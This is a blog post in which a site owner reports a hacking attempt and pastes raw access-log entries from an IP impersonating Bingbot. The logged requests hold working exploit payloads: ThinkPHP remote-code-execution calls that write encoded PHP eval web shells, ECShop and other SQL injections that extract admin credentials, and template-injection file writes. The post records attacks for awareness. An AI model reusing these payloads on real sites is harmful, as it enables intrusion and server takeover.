Category Archives: hacking

124.156.120.3 – Another Hacking Attempt

Found another hacking attempt this morning when examining the access.log. I’ve pasted the requests from 124.156.120.3 below. It appears attempt to inject some PHP and SQL code. In addition 124.156.120.3 also identify itself as Bingbot, which obviously is not true.

124.156.120.3 seems to be assigned to Singapore Tencent Cloud Computing (beijing) Co. Ltd. It’s likely one of their customers that have been hacked. Here’s the location on a Google map:

124.156.120.3 - - [17/Sep/2019:14:08:53 -0700] "PUT //QqYN1A763TmozH0L.txt HTTP/1.1" 404 4221 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:54 -0700] "GET //type.php?template=tag_(){};@unlink(FILE);print_r(blshell);assert($_POST[KxVHuP17U239lQyI]);{//../rss HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:54 -0700] "GET //data/cache_template/rss.tpl.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:55 -0700] "GET //index.php?s=index/\think\template\driver\file/write&cacheFile=53USa9rmzg916cmW.php&content=%3C%3F%70%68%70%0D%0A%0D%0A%0D%0A%24%5F%63%6F%6E%66%69%67%20%3D%20%61%72%72%61%79%28%29%3B%0D%0A%0D%0A%2F%2F%20%20%20%43%4F%4E%46%49%47%20%41%41%41%0A%0D%45%56%41%4C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%20%20%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%61%61%61%0A%0D%65%76%61%6C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%27%5D%20%3D%20%27%61%61%61%61%27%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%53%4F%55%52%43%45%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%63%64%62%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%54%41%52%47%45%54%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%78%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%70%72%65%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%55%43%45%4E%54%45%52%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%54%48%45%20%45%4E%44%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%0D%0A%3F%3E%3C%3F%70%68%70%20%65%63%68%6F%20%27%65%63%68%6F%27%2E%27%54%68%69%6E%6B%50%48%50%27%3F%3E HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:55 -0700] "GET //53USa9rmzg916cmW.php HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:56 -0700] "GET //?s=index/\think\template\driver\file/write&cacheFile=53USa9rmzg916cmW.php&content=%3C%3F%70%68%70%0D%0A%0D%0A%0D%0A%24%5F%63%6F%6E%66%69%67%20%3D%20%61%72%72%61%79%28%29%3B%0D%0A%0D%0A%2F%2F%20%20%20%43%4F%4E%46%49%47%20%41%41%41%0A%0D%45%56%41%4C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%20%20%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%61%61%61%0A%0D%65%76%61%6C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%27%5D%20%3D%20%27%61%61%61%61%27%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%53%4F%55%52%43%45%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%63%64%62%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%54%41%52%47%45%54%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%78%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%70%72%65%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%55%43%45%4E%54%45%52%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%54%48%45%20%45%4E%44%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%0D%0A%3F%3E%3C%3F%70%68%70%20%65%63%68%6F%20%27%65%63%68%6F%27%2E%27%54%68%69%6E%6B%50%48%50%27%3F%3E HTTP/1.1" 200 7350 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:57 -0700] "GET //53USa9rmzg916cmW.php HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:57 -0700] "GET //?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=53USa9rmzg916cmW.php&vars[1][]=%3C%3F%70%68%70%0D%0A%0D%0A%0D%0A%24%5F%63%6F%6E%66%69%67%20%3D%20%61%72%72%61%79%28%29%3B%0D%0A%0D%0A%2F%2F%20%20%20%43%4F%4E%46%49%47%20%41%41%41%0A%0D%45%56%41%4C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%20%20%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%61%61%61%0A%0D%65%76%61%6C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%27%5D%20%3D%20%27%61%61%61%61%27%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%53%4F%55%52%43%45%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%63%64%62%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%54%41%52%47%45%54%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%78%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%70%72%65%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%55%43%45%4E%54%45%52%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%54%48%45%20%45%4E%44%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%0D%0A%3F%3E%3C%3F%70%68%70%20%65%63%68%6F%20%27%65%63%68%6F%27%2E%27%54%68%69%6E%6B%50%48%50%27%3F%3E HTTP/1.1" 200 8202 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:58 -0700] "GET //53USa9rmzg916cmW.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:59 -0700] "GET //?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@eval($_GET[%27f*ck%27]);&f*ck=fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbYmxibF0pPz5ibHNoZWxs)); HTTP/1.1" 200 8204 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:00 -0700] "GET //x.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 124.156.120.3 - - [17/Sep/2019:14:09:00 -0700] "POST //index.php?s=index HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:01 -0700] "GET //d.php HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 124.156.120.3 - - [17/Sep/2019:14:09:01 -0700] "GET //user.php?act=login HTTP/1.1" 404 415 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:280:\"/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a326b75634768774a79776e4a45496a5444772f63476877494756325957776f4a46395154314e55573139644b54732f506963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:3:\"'/\";}" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:01 -0700] "GET //user.php?act=login HTTP/1.1" 404 415 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:280:\"/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a326b75634768774a79776e4a45496a5444772f63476877494756325957776f4a46395154314e55573139644b54732f506963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:3:\"'/\";}" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:02 -0700] "GET //i.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:02 -0700] "GET //user.php?act=login HTTP/1.1" 404 413 "45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:\"num\";s:289:\"/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a326b75634768774a79776e4a45496a5444772f63476877494756325957776f4a46395154314e55573139644b54732f506963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:11:\"-1' UNION/\";}45ea207d7a2b68c49582d2d22adf953a" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:03 -0700] "GET //i.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:04 -0700] "GET //index.php?c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467&param=update_avatar&file=data:image/php;base64,PD9waHAgQGV2YWwoJF9QT1NUW3NoZWxsXSk7Pz5ibHNoZWxs HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:04 -0700] "GET //uploadfile/member/0/0x0.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:05 -0700] "POST //index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 124.156.120.3 - - [17/Sep/2019:14:09:05 -0700] "GET //index.php/list/5/?current={pboot:if(eval\\($_GET['a']))}1{/pboot:if}&a=fputs(fopen(base64_decode('eC5waHA'),'w'),%20base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydibCddKTsgPz5ibHNoZWxs')) HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:06 -0700] "GET //x.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:07 -0700] "HEAD //index.php?_m=mod_email&_a=do_mail HTTP/1.1" 404 396 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:07 -0700] "HEAD //news/html/?410'union//select//1//from//(select//count(),concat(floor(rand(0)2),0x3a,(select//concat(0x23,0x23,0x23,user,0x3a,password,0x23,0x23,0x23)//from//pwn_base_admin//limit//0,1),0x3a)a//from//information_schema.tables//group//by//a)b//where'1'='1.html HTTP/1.1" 404 394 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

